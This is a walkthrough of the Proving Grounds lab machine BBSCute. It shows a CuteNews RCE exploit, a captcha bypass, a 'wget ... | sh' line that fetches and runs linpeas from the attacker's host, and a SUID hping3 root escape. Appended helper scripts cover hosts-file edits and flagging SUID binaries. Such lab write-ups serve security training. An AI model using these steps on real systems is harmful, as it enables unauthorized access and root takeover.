# Offsec Proving Grounds - BBSCute Walkthrough

### Machine Details

#### Name: BBSCute
#### IP address: 192.168.118.128
#### Difficulty: Easy
#### Points: 5

---

## Initial Enumeration

I started the box and was assigned the IP address 192.168.118.128. My first step was to conduct a port scan. For this I used nmap and found the following ports open: `22, 80, 88, 110, 995`.

![](https://i.imgur.com/okvy6jg.png)

Conducting further enumeration, I entered the IP address into the browser and was presented with the page below:

![](https://i.imgur.com/VjpX2Jy.png)

There is also a web service running on port 88, so I visited that page too but was greeted with a Not Found error.

![](https://i.imgur.com/xlrDBsx.png)

I then proceeded to do some directory enumeration on both web services using gobuster.

```
gobuster dir -u http://192.168.118.128 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out
gobuster dir -u http://192.168.118.128:88 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.88.out
```

While that was running, I went back to the web service on port 80 and poked around. Since the page presented was the Apache default page, the server is most likely running PHP. So I tried visiting /index.php and, sure enough, I was presented with a new page running the CuteNews CMS.

![](https://i.imgur.com/HeqBfqr.png)

Since I did not have credentials, I used the register option and registered the user rudefish.

![](https://i.imgur.com/bm7HlTj.png)

One thing I noticed on the registration form was that the captcha was not being displayed, yet it is a required field. What I did was refresh the captcha and monitor the network request to obtain the value from the response. Since the value can be read straight from the response, the check offers no real protection against automated registration.

![](https://i.imgur.com/3mvStb9.png)

Supplying the captcha value, huqora, I was registered and redirected to a dashboard.
![](https://i.imgur.com/Lh60O01.png)

## Gaining access

One thing that caught my attention on the dashboard was the CuteNews version (I had missed this on the login page). I searched Google for this version and found that it is vulnerable to a remote code execution (RCE) exploit.

![](https://i.imgur.com/BrEpg7V.png)

Visiting the link highlighted above for [CVE-2019-11447](https://github.com/thewhiteh4t/cve-2019-11447), it explains the vulnerability and how to use the exploit. I cloned the repo and followed the instructions provided, as shown below.

![](https://i.imgur.com/XXGYLjV.png)

## Editing /etc/hosts file

Although I provided all parameters, I was still getting an error. The error was due to the URL returned from the web page, http://cute.calipendula/uploads/avatar_rudefish_rudefish.php. Since our machine does not know this hostname and cannot resolve it, the exploit gets a connection error when it tries to reach the uploaded file. To solve this, I added the hostname to my /etc/hosts file:

```
192.168.118.128 cute.calipendula
```

![](https://i.imgur.com/vpygkg7.png)

After doing this, I ran the exploit again and got a shell.

![](https://i.imgur.com/naT1b5Q.png)

## Give me local.txt

Just moving around on the box, I changed directories and found the local.txt file in the /var/www folder.

![](https://i.imgur.com/OJN0rOK.png)

In case you navigated straight to the home folder and could not find the file there (obviously :XD), you can locate it (since we know the name) using the command below:

```
find / -type f -name local.txt -ls 2>/dev/null
```

## Finding ways to elevate privileges

One of the first things I do when I gain an initial foothold is to find out which commands I can run as other users via sudo. So I ran the command below.

```
sudo -l
```

![](https://i.imgur.com/au3UJp3.png)

Great! We can run hping3 with the icmp option as root. Truth is, I spent quite some time trying to use it to gain a root shell, as I had found from research, but I could not make it work (probably a rabbit hole).
For the sudo route to work, the rule would have needed a trailing wildcard. sudo matches the argument list in a rule exactly, so without the wildcard no further arguments (and hence no shell escape) are permitted. The entry should have been:

```
(root) NOPASSWD: /usr/sbin/hping3 --icmp *
```

So I moved on to upload and run [linpeas.sh](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) on the machine, and this returned an interesting result.

```
# On my box
python3 -m http.server 80
```

```
# On the target machine
wget -O- http://192.168.49.118/linpeas.sh | sh -
```

![](https://i.imgur.com/5ucth7p.png)

![](https://i.imgur.com/yxr1wS7.png)

linpeas.sh found that the hping3 binary is SUID and owned by root. You can read more about SUID binaries here - [SUID](https://www.techrepublic.com/article/linux-101-what-is-the-suid-permission/). In case you do not like enumeration scripts, you could have found the binary by running the following command:

```
find / -type f -perm -04000 -ls 2>/dev/null
```

## Give me ROOT!!!!

Now all we have to do is run this binary, get its prompt and find a way to get a shell from it. A nice place to look such things up is [gtfobins](https://gtfobins.github.io). At this point we need a proper interactive shell. For this, I used a bash reverse shell and then upgraded it to a TTY using python's pty module.

![](https://i.imgur.com/EAW5kYC.png)

To get a root shell, we just need to run hping3 and, at its prompt, spawn a shell with the `-p` flag so that it keeps the effective root privileges instead of dropping them:

```
/usr/sbin/hping3
hping3> /bin/sh -p
```

![](https://i.imgur.com/Feu94m9.png)

Now we can read proof.txt and we're done!

###### tags: `offsec proving grounds` `BBSCute` `CTF` `CuteNews` `suid`
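Returning to the hostname problem from the exploit step: the name returned by the exploit can be handled without editing /etc/hosts at all. The following added example is my own code, not part of the original walkthrough or of the exploit repository. It uses the hostname and IP from this box, appends a hosts entry idempotently to a hosts file given as a parameter (so it can be tried against a scratch file before touching the real one), and builds the `--resolve` argument that pins a name to an IP for a single curl request. The function names `url_host`, `url_port`, `add_hosts_entry` and `resolve_args` are my own.

```bash
# Added example (not from the original walkthrough): two ways to reach a URL
# whose hostname our attacking machine cannot resolve.
#   (a) append "IP NAME" to a hosts file, only if NAME is not already there;
#   (b) skip the hosts file and pin NAME to IP with curl's --resolve flag.
# Hostname and IP are the ones from the box; the hosts-file path is a parameter.
set -u

# url_host URL -> prints the hostname part of an http(s) URL (no IPv6 brackets)
url_host() {
    rest="${1#*://}"      # strip scheme
    rest="${rest%%/*}"    # strip path
    rest="${rest%%:*}"    # strip explicit port
    printf '%s\n' "$rest"
}

# url_port URL -> prints the explicit port, else 80 for http / 443 for https
url_port() {
    url="$1"
    rest="${url#*://}"
    rest="${rest%%/*}"
    case "$rest" in
        *:*) printf '%s\n' "${rest##*:}" ;;
        *)   case "$url" in https://*) echo 443 ;; *) echo 80 ;; esac ;;
    esac
}

# add_hosts_entry HOSTSFILE IP NAME -> appends "IP NAME" unless NAME is already
# listed as a hostname on a non-comment line (exact field match, not substring)
add_hosts_entry() {
    file="$1"; ip="$2"; name="$3"
    if awk -v n="$name" '!/^#/ { for (i = 2; i <= NF; i++) if ($i == n) found = 1 } END { exit !found }' "$file" 2>/dev/null; then
        return 0
    fi
    printf '%s %s\n' "$ip" "$name" >> "$file"
}

# resolve_args URL IP -> prints the curl argument that pins URL's host to IP
resolve_args() {
    printf -- '--resolve %s:%s:%s\n' "$(url_host "$1")" "$(url_port "$1")" "$2"
}

# Usage against this box (hosts file variant, as the walkthrough did):
#   add_hosts_entry /etc/hosts 192.168.118.128 cute.calipendula
# Usage without touching /etc/hosts, for the URL the exploit returned:
#   url=http://cute.calipendula/uploads/avatar_rudefish_rudefish.php
#   curl $(resolve_args "$url" 192.168.118.128) "$url"
```

With `--resolve`, curl connects to the given IP while the request still carries `Host: cute.calipendula`, so a virtual host configured for that name keeps answering; simply swapping the bare IP into the URL would not guarantee that.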
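The SUID sweep that linpeas did for us can be done by hand and cross-checked against binaries that GTFOBins documents with a SUID shell escape, which is how a manual pass would land on hping3. The following added example is my own code, not from the walkthrough, linpeas or GTFOBins. It takes the directory tree to search as a parameter so it can be exercised on a scratch directory; the candidate list in `is_gtfo_suid` is a hand-picked subset I chose, not an export of GTFOBins, and the function names `find_suid`, `is_gtfo_suid` and `flag_suid` are mine.

```bash
# Added example (not from the original walkthrough): enumerate setuid files
# under a given root and flag the ones whose name matches a known SUID
# shell-escape binary, so the interesting hit stands out from the usual
# passwd/su/ping noise.
set -u

# find_suid ROOT -> one path per line for every regular file with the setuid bit
find_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# is_gtfo_suid NAME -> exit 0 if NAME is in our hand-picked list of binaries
# that GTFOBins documents with a SUID shell escape (assumption: a subset only)
is_gtfo_suid() {
    case "$1" in
        hping3|find|vim|vi|python|python3|perl|bash|sh|env|awk|less|more) return 0 ;;
        *) return 1 ;;
    esac
}

# flag_suid ROOT -> prints "<path> GTFO" for candidates, "<path>" for the rest
flag_suid() {
    find_suid "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        if is_gtfo_suid "$name"; then
            printf '%s GTFO\n' "$path"
        else
            printf '%s\n' "$path"
        fi
    done
}

# Usage on the target (drop -xdev in find_suid if /home or /usr is a separate fs):
#   flag_suid / | grep GTFO
```

On this box the flagged line would be `/usr/sbin/hping3 GTFO`; the root shell then follows the gtfobins recipe shown above.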